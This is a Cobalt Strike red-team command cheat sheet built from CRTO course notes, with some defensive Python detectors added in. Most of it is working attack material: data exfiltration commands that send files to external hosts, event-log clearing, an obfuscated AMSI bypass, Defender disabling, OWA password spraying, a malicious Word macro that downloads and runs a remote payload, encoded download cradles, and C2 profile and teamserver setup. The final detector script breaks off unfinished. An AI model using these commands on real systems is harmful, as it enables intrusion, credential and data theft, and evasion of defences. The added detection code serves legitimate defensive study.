Cobalt Strike Notes
Notes for Cobalt Strike
Name : CRTO - Red Teaming Command Cheat Sheet (Cobalt Strike)
Course Link : https://training.zeropointsecurity.co.uk/courses/red-team-ops
Compiled By : **Emanuele Picariello ( x: https://x.com/EmanuelePicari5 YouTube: https://www.youtube.com/watch?v=rjY884Pamig )** Disclaimer : This cheat sheet has been compiled from multiple sources with the objective of aiding fellow pentesters and red teamers in their learning. The credit for all the tools and techniques belongs to their original authors.
Modified By: Shiro
CRTO - Red Teaming Command Cheat Sheet (Cobalt Strike)
Data Exfiltration
Network Share Enumeration
Usage: Discover and access network file shares containing sensitive data.
```
# General share discovery
beacon> powerpick Invoke-ShareFinder
beacon> powerpick Invoke-FileFinder
beacon> powerpick Get-NetFileServer
# Search for Group Policy Preferences passwords (cpassword) in SYSVOL
beacon> shell findstr /S /I cpassword \\dc.organicsecurity.local\sysvol\organicsecurity.local\policies\*.xml
# Decrypt a cpassword value found above
beacon> powerpick Get-DecryptedCpassword <cpassword>
# Find accessible shares with sensitive files
beacon> powerpick Find-DomainShare -CheckShareAccess
beacon> powerpick Find-InterestingDomainShareFile -Include *.doc*, *.xls*, *.csv, *.ppt*
# Preview file contents
beacon> powerpick gc \\fs.dev.cyberbotic.io\finance$\export.csv | select -first 5
```
Database Data Discovery
Usage: Search for sensitive information in accessible databases.
```
# Search for sensitive keywords in accessible databases
beacon> powerpick Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLColumnSampleDataThreaded -Keywords "email,address,credit,card" -SampleSize 5 | select instance, database, column, sample | ft -autosize
# Database link enumeration and data extraction
beacon> powerpick Get-SQLQuery -Instance "sql-2.dev.cyberbotic.io,1433" -Query "select * from openquery(""sql-1.cyberbotic.io"", 'select * from information_schema.tables')"
beacon> powerpick Get-SQLQuery -Instance "sql-2.dev.cyberbotic.io,1433" -Query "select * from openquery(""sql-1.cyberbotic.io"", 'select column_name from master.information_schema.columns where table_name=''employees''')"
beacon> powerpick Get-SQLQuery -Instance "sql-2.dev.cyberbotic.io,1433" -Query "select * from openquery(""sql-1.cyberbotic.io"", 'select top 5 first_name,gender,sort_code from master.dbo.employees')"
```
File System Search Techniques
Usage: Search for sensitive files across the network.
```
# Search for specific file types
beacon> powerpick Get-ChildItem -Path "\\server\share" -Recurse -Include *.xlsx,*.docx,*.pdf | select FullName,Length,LastWriteTime
# Search file contents for keywords
beacon> powerpick Select-String -Path "\\server\share\*.txt" -Pattern "password|credential|secret" | select Filename,LineNumber,Line
# Search the registry for stored credentials
beacon> powerpick Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" | select DefaultUserName,DefaultPassword
```
Data Staging and Compression
Usage: Prepare data for exfiltration while minimizing detection.
```
# Create staging directory
beacon> mkdir C:\Windows\Temp\Updates
# Compress data for exfiltration
beacon> powerpick Compress-Archive -Path "\\server\share\sensitive_folder" -DestinationPath "C:\Windows\Temp\Updates\data.zip"
# Alternative: in-place NTFS compression of the staging directory with the built-in compact.exe (compresses files on disk, does not create an archive)
beacon> shell compact /c /s:"C:\Windows\Temp\Updates" /i
# Base64 encode small files for easy transfer
beacon> powerpick [System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes("C:\sensitive\file.txt")) | Out-File "C:\Windows\Temp\encoded.txt"
```
Exfiltration Methods
Usage: Transfer data out of the network using various techniques.
```
# HTTP POST exfiltration
beacon> powerpick Invoke-WebRequest -Uri "http://exfil-server.com/upload" -Method POST -InFile "C:\Windows\Temp\Updates\data.zip"
# DNS exfiltration (for small amounts of data)
beacon> powerpick $data = [System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes("C:\small_file.txt")); nslookup "$data.exfil.domain.com"
# Email exfiltration
beacon> powerpick Send-MailMessage -From "user@company.com" -To "attacker@external.com" -Subject "Report" -Attachments "C:\Windows\Temp\Updates\data.zip" -SmtpServer "mail.company.com"
# Cloud storage upload (if tools are available)
beacon> powerpick Start-Process -FilePath "C:\Program Files\CloudSync\sync.exe" -ArgumentList "--upload C:\Windows\Temp\Updates\data.zip" -WindowStyle Hidden
```
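The DNS method above encodes file content into query names, which is exactly the shape a defender can look for in resolver logs. The following is an added example, not code from the cheat sheet or the course: a small query-log analyser that flags queries with unusually long labels, high-entropy subdomains, or one client churning through many distinct subdomains of a single parent domain. The log line format, the thresholds and the sample lines are constructed assumptions; real resolver logs (BIND, Windows DNS, Zeek dns.log) need their own parser, and the thresholds should be tuned against a baseline of the environment's own traffic.

```python
import math
import re
from collections import defaultdict
from typing import Dict, List

# Constructed sample of a resolver query log, one query per line:
# "<timestamp> <client_ip> <qname> <qtype>".  Real logs have other layouts;
# adjust LINE accordingly.
SAMPLE_LOG = """\
2024-05-01T10:00:01Z 10.1.2.33 www.microsoft.com A
2024-05-01T10:00:02Z 10.1.2.33 abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGH.exfil.example A
2024-05-01T10:00:03Z 10.1.2.33 HGFEDCBA9876543210zyxwvutsrqponmlkjihgfedcba.exfil.example A
2024-05-01T10:00:04Z 10.1.2.50 login.microsoftonline.com A
2024-05-01T10:00:05Z 10.1.2.33 0123456789abcdefghijklmnopqrstuvwxyzABCDEFGH.exfil.example A
2024-05-01T10:00:06Z 10.1.2.50 cdn.example A
"""

LINE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)$")

# Assumed thresholds; tune them against a baseline of the environment's own traffic.
MAX_LABEL = 32          # longest single label a benign hostname is expected to carry
MIN_ENTROPY = 3.5       # bits per character of the subdomain part
MIN_ENTROPY_LEN = 20    # entropy is only meaningful on a reasonably long string
MAX_UNIQUE_SUBS = 2     # distinct subdomains per (client, parent domain) before flagging


def shannon_entropy(s: str) -> float:
    """Shannon entropy of a string in bits per character."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(s.count(c) / n * math.log2(s.count(c) / n) for c in set(s))


def query_reasons(qname: str) -> List[str]:
    """Per-query indicators: an unusually long label or a high-entropy subdomain.
    Assumes a two-label registered domain (example.com); suffixes such as
    co.uk would need a public-suffix list instead."""
    labels = qname.rstrip(".").split(".")
    sub_labels = labels[:-2]
    reasons = []
    longest = max((len(label) for label in sub_labels), default=0)
    if longest > MAX_LABEL:
        reasons.append(f"label length {longest}")
    joined = "".join(sub_labels)
    ent = shannon_entropy(joined)
    if len(joined) >= MIN_ENTROPY_LEN and ent > MIN_ENTROPY:
        reasons.append(f"entropy {ent:.2f}")
    return reasons


def analyze(log_text: str) -> Dict[str, List[str]]:
    """Return {qname or client->parent group: [reasons]} for everything worth a look."""
    findings: Dict[str, List[str]] = {}
    unique_subs = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue
        _ts, client, qname, _qtype = m.groups()
        reasons = query_reasons(qname)
        if reasons:
            findings[qname] = reasons
        labels = qname.rstrip(".").lower().split(".")
        if len(labels) > 2:
            parent = ".".join(labels[-2:])
            unique_subs[(client, parent)].add(".".join(labels[:-2]))
    # Volume indicator: one client resolving many distinct names under one parent.
    for (client, parent), subs in unique_subs.items():
        if len(subs) > MAX_UNIQUE_SUBS:
            findings[f"{client} -> *.{parent}"] = [f"{len(subs)} distinct subdomains"]
    return findings


if __name__ == "__main__":
    for key, reasons in analyze(SAMPLE_LOG).items():
        print(f"{key}: {', '.join(reasons)}")
```

The per-query rules catch a single oversized or random-looking label; the per-client volume rule catches the case where each chunk is kept short enough to look ordinary but the number of distinct names gives the transfer away.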
Covering Tracks
Usage: Remove evidence of data access and exfiltration.
```
# Clear PowerShell history
beacon> powerpick Remove-Item (Get-PSReadlineOption).HistorySavePath -Force
# Clear Windows event logs
beacon> powerpick wevtutil cl System
beacon> powerpick wevtutil cl Security
beacon> powerpick wevtutil cl Application
# Remove staging files
beacon> shell sdelete -p 3 -s -z C:\Windows\Temp\Updates
beacon> rmdir C:\Windows\Temp\Updates
# Overwrite file timestamps (Beacon's timestomp copies the timestamps of a reference file onto the target)
beacon> timestomp "\\server\share\accessed_file.xlsx" <reference_file>
# Clear browser history and cache
beacon> powerpick Remove-Item -Path "$env:LOCALAPPDATA\Microsoft\Windows\WebCache\*" -Force -Recurse
beacon> powerpick Remove-Item -Path "$env:APPDATA\Microsoft\Windows\Recent\*" -Force
```
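Clearing event logs is one of the loudest things in this section from a defender's point of view, because Windows records the clearing itself: Security event 1102 ("The audit log was cleared") and System event 104 ("The ... log file was cleared") are written to the log that was just emptied, carrying the account that did it. The following is an added example, not from the cheat sheet: a detection pass over constructed event records that flags those two events and, from process-creation records, command lines that invoke `wevtutil cl`/`clear-log` or the `Clear-EventLog`/`Remove-EventLog` cmdlets. The flat JSON-like record shape and the sample events are constructed; a real pipeline would map its own field names onto them.

```python
import re
from typing import Dict, List

# Constructed event records in a simplified flat shape (field names follow the
# Windows EventData names, but this is not a real export).
SAMPLE_EVENTS: List[Dict] = [
    {"Channel": "Security", "EventID": 4688, "Computer": "WKSTN-1",
     "SubjectUserName": "jdoe", "CommandLine": "wevtutil.exe cl Security"},
    {"Channel": "Security", "EventID": 1102, "Computer": "WKSTN-1", "SubjectUserName": "jdoe"},
    {"Channel": "System", "EventID": 104, "Computer": "WKSTN-1", "SubjectUserName": "jdoe"},
    {"Channel": "Security", "EventID": 4688, "Computer": "WKSTN-1",
     "SubjectUserName": "svc_backup", "CommandLine": "wevtutil.exe qe Application /c:5 /f:text"},
    {"Channel": "Security", "EventID": 4688, "Computer": "WKSTN-2",
     "SubjectUserName": "admin", "CommandLine": "powershell.exe -Command Clear-EventLog -LogName Application"},
    {"Channel": "Security", "EventID": 4624, "Computer": "WKSTN-2", "SubjectUserName": "admin"},
]

# Events the Eventlog service writes when a log is cleared.  They land in the
# log that was cleared, so they survive the clearing itself.
LOG_CLEARED = {
    ("Security", 1102): "Security audit log cleared",
    ("System", 104): "event log file cleared",
}

# Command-line patterns for process creation records (Security 4688 / Sysmon 1).
CLEAR_CMD = re.compile(
    r"(?i)\bwevtutil(?:\.exe)?\s+(?:cl|clear-log)\b"
    r"|\bClear-EventLog\b"
    r"|\bRemove-EventLog\b"
)


def detect_log_clearing(events: List[Dict]) -> List[Dict]:
    """Return one hit per indicator, preserving event order."""
    hits = []
    for ev in events:
        base = {"computer": ev.get("Computer"), "user": ev.get("SubjectUserName"),
                "event_id": ev.get("EventID")}
        key = (ev.get("Channel"), ev.get("EventID"))
        if key in LOG_CLEARED:
            hits.append({**base, "reason": LOG_CLEARED[key]})
        cmd = ev.get("CommandLine", "")
        if cmd and CLEAR_CMD.search(cmd):
            hits.append({**base, "reason": f"log-clearing command: {cmd}"})
    return hits


if __name__ == "__main__":
    for hit in detect_log_clearing(SAMPLE_EVENTS):
        print(f"{hit['computer']} {hit['user']} [{hit['event_id']}] {hit['reason']}")
```

Forwarding logs off-host (Windows Event Forwarding or an agent) before any of the commands in this section run is what makes the 1102/104 records useful; on the endpoint alone they only tell you a log was emptied, not what it contained.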
Additional Tips and Best Practices
Operational Security (OPSEC)
Key considerations for maintaining stealth during operations:
- Process Selection: Always use legitimate processes for spawning beacons
- Sleep and Jitter: Configure appropriate sleep intervals with jitter to blend in
- Communication Profiles: Use realistic HTTP headers and URIs in C2 profiles
- Artifact Staging: Place files in expected locations (temp directories, system folders)
- Time-based Operations: Operate during business hours to blend with normal activity
Common Pitfalls
Avoid these common mistakes:
- Using Default Profiles: Always customize C2 profiles for the target environment
- Excessive Network Noise: Limit unnecessary network connections and scans
- Poor Credential Hygiene: Rotate and limit credential usage across systems
- Ignoring EDR: Test payloads against target EDR solutions before deployment
- Inadequate Cleanup: Always remove artifacts and close unnecessary sessions
Emergency Procedures
Incident response and cleanup procedures:
```
# Emergency beacon cleanup
beacon> jobs             # List active jobs
beacon> jobkill <job_id> # Kill specific jobs
beacon> exit             # Cleanly exit beacon
# Remove persistence mechanisms
beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t schtask -n "Updater" -m remove
beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t service -n "legit-svc" -m remove
# Clear artifacts
beacon> shell del /f /q C:\Windows\Temp\*.exe
beacon> shell del /f /q C:\ProgramData\*.exe
beacon> powerpick Remove-Item -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run\Updater" -Force
```
Useful One-Liners
Quick commands for common tasks:
```
# Quick domain admin check
beacon> powerpick Get-DomainGroupMember "Domain Admins" | select MemberName
# Find computers where the current user has local admin access
beacon> powerpick Get-DomainComputer | ? { Invoke-CheckLocalAdminAccess -ComputerName $_.dnshostname }
# Quick kerberoasting
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /nowrap
# Simple DCSync
beacon> dcsync <domain> <user>
# Fast LAPS password extraction
beacon> powerpick Get-DomainComputer -Properties ms-Mcs-AdmPwd | ? { $_."ms-Mcs-AdmPwd" -ne $null }
```
Troubleshooting
Common Issues and Solutions
Beacon Connection Issues
```
# Check network connectivity
beacon> shell ping <teamserver_ip>
beacon> shell telnet <teamserver_ip> <port>
# Verify listener configuration
# Check firewall rules on the teamserver
# Validate C2 profile syntax (c2lint)
```
PowerShell Execution Issues
```
# Check execution policy
beacon> powershell Get-ExecutionPolicy
# Use alternative execution methods
beacon> powerpick <command>            # Unmanaged runspace
beacon> execute-assembly <path> <args> # .NET assembly execution
```
Privilege Issues
```
# Check current privileges
beacon> shell whoami /priv
beacon> shell whoami /groups
# Verify token context
beacon> getuid
beacon> rev2self # Return to the original token
```
AV/EDR Detection
```
# Check running security products
beacon> shell tasklist /svc | findstr /i "defender symantec mcafee kaspersky crowdstrike carbon"
# Use alternative techniques
beacon> shinject <pid> x64 <payload> # Shellcode injection
beacon> execute-assembly <tool>      # In-memory .NET execution
```
References and Resources
Essential Tools
- Cobalt Strike: Commercial C2 framework
- Rubeus: Kerberos abuse tool
- PowerView: PowerShell AD enumeration
- Mimikatz: Credential dumping and manipulation
- Seatbelt: System enumeration
- SharpUp: Privilege escalation discovery
Useful Links
- Cobalt Strike Documentation
- MITRE ATT&CK Framework
- Zero Point Security Training
- Harmj0y’s Blog
- SpecterOps Blog
Learning Resources
- Books: “Red Team Development and Operations” by Joe Vest
- Courses: CRTO, CRTE, OSEP, GCFA
- Labs: HackTheBox, TryHackMe, VulnHub
- Conferences: DEF CON, BSides, DerbyCon
End of Enhanced CRTO Notes
Remember: These techniques should only be used in authorized penetration testing and red team exercises. Always ensure proper authorization and follow responsible disclosure practices.
Miscellaneous
Quick Commands
```
# Run a python3 webserver for hosting payloads
$ python3 -m http.server 80
# Check outbound access to the TeamServer from a Windows host
PS> iwr -Uri http://nickelviper.com/a
# Firewall management
beacon> powerpick New-NetFirewallRule -DisplayName "Test Rule" -Profile Domain -Direction Inbound -Action Allow -Protocol TCP -LocalPort 8080
beacon> powerpick Remove-NetFirewallRule -DisplayName "Test Rule"
```
Payload Encoding
Usage: Handle extra quotes in PowerShell payloads by encoding them in Base64.
```
# PowerShell method
PS C:\> $str = 'IEX ((new-object net.webclient).downloadstring("http://nickelviper.com/a"))'
PS C:\> [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))
# Linux method
$ echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.31/shell.ps1')" | iconv -t UTF-16LE | base64 -w 0
# Execute the encoded payload
powershell -nop -enc <BASE64_ENCODED_PAYLOAD>
```
Command & Control
DNS Configuration for DNS Beacon
Usage: Configure DNS records to enable DNS-based C2 communication.
```
# Set DNS records where the IP points to the TeamServer
@    | A  | 10.10.5.50
ns1  | A  | 10.10.5.50
pics | NS | ns1.nickelviper.com
# Verify the DNS configuration (should return 0.0.0.0)
$ dig @ns1.nickelviper.com test.pics.nickelviper.com +short
# Use pics.nickelviper.com as DNS Host and Stager in the listener configuration
```
TeamServer Setup
Manual Start
```
# Start the TeamServer with a C2 profile
> sudo ./teamserver 10.10.5.50 Passw0rd! c2-profiles/normal/webbug.profile
```
Service Configuration
Usage: Run TeamServer as a persistent system service.
```
# Create the systemd service file
$ sudo vim /etc/systemd/system/teamserver.service

[Unit]
Description=Cobalt Strike Team Server
After=network.target
StartLimitIntervalSec=0

[Service]
Type=simple
Restart=always
RestartSec=1
User=root
WorkingDirectory=/home/attacker/cobaltstrike
ExecStart=/home/attacker/cobaltstrike/teamserver 10.10.5.50 Passw0rd! c2-profiles/normal/webbug.profile

[Install]
WantedBy=multi-user.target

# Service management
$ sudo systemctl daemon-reload
$ sudo systemctl status teamserver.service
$ sudo systemctl start teamserver.service
$ sudo systemctl enable teamserver.service
```
Automated Web Delivery Setup
Usage: Automatically host web delivery payloads using agscript in headless mode.
```
# Create the host_payloads.cna script
$ cat host_payloads.cna
# Connected and ready
on ready {
    # Generate payload
    $payload = artifact_payload("http", "powershell", "x64");
    # Host payload
    site_host("10.10.5.50", 80, "/a", $payload, "text/plain", "Auto Web Delivery (PowerShell)", false);
}

# Add to the systemd service file
ExecStartPost=/bin/sh -c '/usr/bin/sleep 30; /home/attacker/cobaltstrike/agscript 127.0.0.1 50050 headless Passw0rd! host_payloads.cna &'
```
Custom C2 Profile
Usage: Example malleable C2 profile for better operational security.
```
set sample_name "Dumbledore";
set sleeptime "5000";
set jitter "20";
set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36";
set host_stage "true";

post-ex {
    set amsi_disable "true";
    set spawnto_x86 "%windir%\\syswow64\\dllhost.exe";
    set spawnto_x64 "%windir%\\sysnative\\dllhost.exe";
}

http-get {
    set uri "/cat.gif /image /pixel.gif /logo.gif";
    client {
        header "Accept" "text/html,image/avif,image/webp,*/*";
        header "Accept-Language" "en-US,en;q=0.5";
        header "Accept-Encoding" "gzip, deflate";
        header "Referer" "https://www.google.com";
        parameter "utm" "ISO-8898-1";
        parameter "utc" "en-US";
        metadata {
            base64;
            header "Cookie";
        }
    }
    server {
        header "Content-Type" "image/gif";
        header "Server" "Microsoft IIS/10.0";
        header "X-Powered-By" "ASP.NET";
        output {
            prepend "\x01\x00\x01\x00\x00\x02\x01\x44\x00\x3b";
            prepend "\xff\xff\xff\x21\xf9\x04\x01\x00\x00\x00\x2c\x00\x00\x00\x00";
            prepend "\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\x00\x00";
            print;
        }
    }
}

http-post {
    set uri "/submit.aspx /finish.aspx";
    client {
        header "Content-Type" "application/octet-stream";
        header "Accept" "text/html,image/avif,image/webp,*/*";
        header "Accept-Language" "en-US,en;q=0.5";
        header "Accept-Encoding" "gzip, deflate";
        header "Referer" "https://www.google.com";
        id {
            parameter "id";
        }
        output {
            print;
        }
    }
    server {
        header "Content-Type" "text/plain";
        header "Server" "Microsoft IIS/10.0";
        header "X-Powered-By" "ASP.NET";
        output {
            print;
        }
    }
}

http-stager {
    server {
        header "Content-Type" "application/octet-stream";
        header "Server" "Microsoft IIS/10.0";
        header "X-Powered-By" "ASP.NET";
    }
}
```
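The http-get server block above answers with Content-Type image/gif and prepends the bytes of a tiny GIF in front of Beacon's output, so to a casual look the response is a 1x1 image. The check a defender can apply at a proxy or in traffic analysis is to insist that a body served as image/gif actually is one and nothing more. The following is an added example, not code from the cheat sheet, the course or Cobalt Strike: a strict minimal GIF block walker that reports either bytes after the GIF trailer (0x3B) or a body that stops parsing. The 43-byte standard 1x1 GIF is constructed; the profile prefix is the three prepend values from the profile above in wire order (the prepend listed last is applied last, so it ends up first). As written on this page, those bytes come one byte short of a complete two-entry colour table, so the walker stops at offset 19 rather than reaching the trailer; both outcomes are findings for a response that claims to be an image.

```python
from typing import Tuple

# Constructed: a spec-conformant 1x1 transparent GIF (43 bytes).
STD_GIF = (
    b"GIF89a"                                    # header
    b"\x01\x00\x01\x00\x80\x00\x00"              # logical screen descriptor, GCT flag set
    b"\x00\x00\x00\xff\xff\xff"                  # global colour table, 2 entries
    b"\x21\xf9\x04\x01\x00\x00\x00\x00"          # graphic control extension
    b"\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00"  # image descriptor
    b"\x02\x02\x44\x01\x00"                      # LZW min code size + data sub-block
    b"\x3b"                                      # trailer
)

# The profile's three prepend values in the order they appear on the wire.
PROFILE_PREFIX = (
    b"\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\x00\x00"
    b"\xff\xff\xff\x21\xf9\x04\x01\x00\x00\x00\x2c\x00\x00\x00\x00"
    b"\x01\x00\x01\x00\x00\x02\x01\x44\x00\x3b"
)


def _skip_sub_blocks(body: bytes, pos: int) -> int:
    """Skip length-prefixed data sub-blocks through the 0x00 block terminator.
    Raises IndexError if the body ends first."""
    while True:
        size = body[pos]
        pos += 1
        if size == 0:
            return pos
        pos += size


def gif_end(body: bytes) -> Tuple[int, int]:
    """Walk the GIF block structure.  Returns (end, -1) with end just past the
    trailer, or (-1, offset) where the structure stops making sense."""
    if len(body) < 13 or body[:6] not in (b"GIF87a", b"GIF89a"):
        return -1, 0
    pos = 13                                  # header (6) + screen descriptor (7)
    packed = body[10]
    if packed & 0x80:                         # global colour table present
        pos += 3 * (2 << (packed & 0x07))     # 2^(N+1) entries of 3 bytes
    try:
        while True:
            introducer = body[pos]
            if introducer == 0x3B:            # trailer
                return pos + 1, -1
            if introducer == 0x21:            # extension: label byte, then sub-blocks
                pos = _skip_sub_blocks(body, pos + 2)
            elif introducer == 0x2C:          # image descriptor (10) + LZW min code size (1)
                pos = _skip_sub_blocks(body, pos + 11)
            else:
                return -1, pos
    except IndexError:                        # truncated inside a block
        return -1, min(pos, len(body))


def check_gif_body(body: bytes) -> str:
    """Verdict for a response body whose Content-Type claims image/gif."""
    end, bad = gif_end(body)
    if end < 0:
        return f"malformed GIF at offset {bad}"
    extra = len(body) - end
    return "clean" if extra == 0 else f"{extra} bytes after GIF trailer"


if __name__ == "__main__":
    samples = [
        ("standard 1x1 gif", STD_GIF),
        ("standard gif + 32 appended bytes", STD_GIF + b"A" * 32),
        ("profile prefix + 27 appended bytes", PROFILE_PREFIX + b"B" * 27),
    ]
    for name, body in samples:
        print(f"{name}: {check_gif_body(body)}")
```

The image descriptor ignores the sub-block contents rather than decoding LZW, which is enough for the structural question here; a defender who wants to go further can hand bodies that pass this check to a real image decoder and compare the declared and actual dimensions.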
Defender Antivirus
Artifact Kit Compilation
Usage: Compile custom artifact kit to evade AV detection.
```
# Compile the Artifact Kit
$ ./build.sh pipe VirtualAlloc 277492 5 false false /mnt/c/Tools/cobaltstrike/artifacts
# Compile the Resource Kit
$ ./build.sh /mnt/c/Tools/cobaltstrike/resources
```
Payload Testing
Usage: Test payloads against Windows Defender before deployment.
```
# Test an executable payload
PS> C:\Tools\ThreatCheck\ThreatCheck\bin\Debug\ThreatCheck.exe -f C:\Payloads\smb_x64.svc.exe
# Test a PowerShell payload against AMSI
PS> C:\Tools\ThreatCheck\ThreatCheck\bin\Debug\ThreatCheck.exe -f C:\Payloads\http_x64.ps1 -e AMSI
# Load the CNA file: Cobalt Strike > Script Manager > Load and select the CNA
# Use Payloads > Windows Stageless Generate All Payloads to replace all payloads in C:\Payloads
```
C2 Profile Modifications
Usage: Enable AMSI bypass in malleable C2 profile.
```
# Add to the C2 profile above the http-get block
post-ex {
    set amsi_disable "true";
}
# Verify the modified C2 profile
$ ./c2lint c2-profiles/normal/webbug.profile
```
Note: `amsi_disable` only applies to the `powerpick`, `execute-assembly` and `psinject` commands, not to the `powershell` command.
Process Spawning Configuration
Usage: Change default processes for better behavioral detection evasion.
```
# Change spawn-to processes
beacon> spawnto x64 %windir%\sysnative\dllhost.exe
beacon> spawnto x86 %windir%\syswow64\dllhost.exe
# Change the default process for psexec
beacon> ak-settings spawnto_x64 C:\Windows\System32\dllhost.exe
beacon> ak-settings spawnto_x86 C:\Windows\SysWOW64\dllhost.exe
```
Defender Management
Usage: Disable Windows Defender components from PowerShell (requires admin).
```
# Check current Defender settings
Get-MPPreference
# Disable Defender components
Set-MPPreference -DisableRealTimeMonitoring $true
Set-MPPreference -DisableIOAVProtection $true
Set-MPPreference -DisableIntrusionPreventionSystem $true
```
AMSI Bypass
Usage: Bypass AMSI in PowerShell sessions.
```
# AMSI bypass payload (execute in PowerShell)
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
```
Initial Compromise
OWA Enumeration and Password Spraying
Usage: Identify valid users and conduct password spraying against OWA.
```
# 1. Identify the mail server
$ dig cyberbotic.io
$ ./dnscan.py -d cyberbotic.io -w subdomains-100.txt
# 2. Identify the NetBIOS name
ps> ipmo C:\Tools\MailSniper\MailSniper.ps1
ps> Invoke-DomainHarvestOWA -ExchHostname mail.cyberbotic.io
# 3. Prepare a username list from employee names
$ ~/namemash.py names.txt > possible.txt
# 4. Validate usernames
ps> Invoke-UsernameHarvestOWA -ExchHostname mail.cyberbotic.io -Domain cyberbotic.io -UserList .\Desktop\possible.txt -OutFile .\Desktop\valid.txt
# 5. Password spraying
ps> Invoke-PasswordSprayOWA -ExchHostname mail.cyberbotic.io -UserList .\Desktop\valid.txt -Password Summer2022
# 6. Download the Global Address List with valid credentials
ps> Get-GlobalAddressList -ExchHostname mail.cyberbotic.io -UserName cyberbotic.io\iyates -Password Summer2022 -OutFile .\Desktop\gal.txt
```
Malicious Office Macro
Usage: Create a Word document with embedded macro for initial access.
```vba
' Step 1: Create a basic macro for testing
' Open Word > View > Macros > Create > Name: AutoOpen
Sub AutoOpen()
    Dim Shell As Object
    Set Shell = CreateObject("wscript.shell")
    Shell.Run "notepad"
End Sub

' Step 2: Production macro with web delivery
' Generate payload: Attacks > Scripted Web Delivery (S) > 64-bit PowerShell
Sub AutoOpen()
    Dim Shell As Object
    Set Shell = CreateObject("wscript.shell")
    Shell.Run "powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('http://nickelviper.com/a'))"""
End Sub

' Step 3: Save as a .doc file for the phishing campaign
```
Host Reconnaissance
Process and System Enumeration
Usage: Gather information about the compromised system.
```
# Identify running processes (AV, EDR, monitoring tools)
beacon> ps
# System enumeration with Seatbelt
beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe -group=system
# User activity monitoring
beacon> screenshot
beacon> clipboard
beacon> net logons
# Keylogger operations
beacon> keylogger
beacon> jobs      # List active jobs
beacon> jobkill 3 # Kill a specific job
```
Host Persistence
Payload Encoding for Persistence
Usage: Encode PowerShell payloads to handle special characters in persistence mechanisms.
```
# Default PowerShell locations
C:\windows\syswow64\windowspowershell\v1.0\powershell
C:\Windows\System32\WindowsPowerShell\v1.0\powershell
# Payload encoding (same as in the Miscellaneous section)
PS C:\> $str = 'IEX ((new-object net.webclient).downloadstring("http://nickelviper.com/a"))'
PS C:\> [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))
# Linux alternative
$ echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.31/shell.ps1')" | iconv -t UTF-16LE | base64 -w 0
# Final execution command
powershell -nop -enc <BASE64_ENCODED_PAYLOAD>
```
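Both "Payload Encoding" sections (the one under Miscellaneous and this one) describe the same transform: the script is encoded as UTF-16LE, then Base64, and handed to `-EncodedCommand`. The defender's side of that is the inverse: pull the argument out of a logged command line (Security 4688, Sysmon event 1, or a scheduled-task/Run-key value such as the ones in the persistence sections) and decode it so the real script can be read and matched against download-cradle indicators. The following is an added example, not code from the cheat sheet or the course; the sample command line, the placeholder URL and the marker list are constructed, and `encode_command` exists only to build the sample with the same transform the page describes.

```python
import base64
import re
from typing import Dict, Optional

# The documented "-ec" alias plus any prefix of "EncodedCommand": PowerShell
# accepts unambiguous prefixes of its switches, so "-e", "-en", "-enc" all work.
_SWITCH = "|".join(["ec"] + ["encodedcommand"[:i] for i in range(1, 15)])
ENC_ARG = re.compile(r"(?i)(?:^|\s)-(?:" + _SWITCH + r")\s+([A-Za-z0-9+/=]+)")

# Substrings that usually mean a download cradle or a second decoding stage
# (constructed starter list, not exhaustive).
CRADLE_MARKERS = ("iex", "invoke-expression", "downloadstring", "net.webclient",
                  "invoke-webrequest", "frombase64string")


def encode_command(script: str) -> str:
    """Same transform as [Convert]::ToBase64String over Unicode (UTF-16LE)
    bytes; used here only to construct the sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Extract and decode the -EncodedCommand argument; None if absent or invalid."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
        return None


def triage(cmdline: str) -> Dict:
    """Decode if possible and report which cradle markers the script contains."""
    decoded = decode_encoded_command(cmdline)
    lowered = decoded.lower() if decoded else ""
    markers = [mk for mk in CRADLE_MARKERS if mk in lowered]
    return {"encoded": decoded is not None, "decoded": decoded,
            "markers": markers, "suspicious": bool(markers)}


# Constructed sample process-creation command line; the URL is a placeholder.
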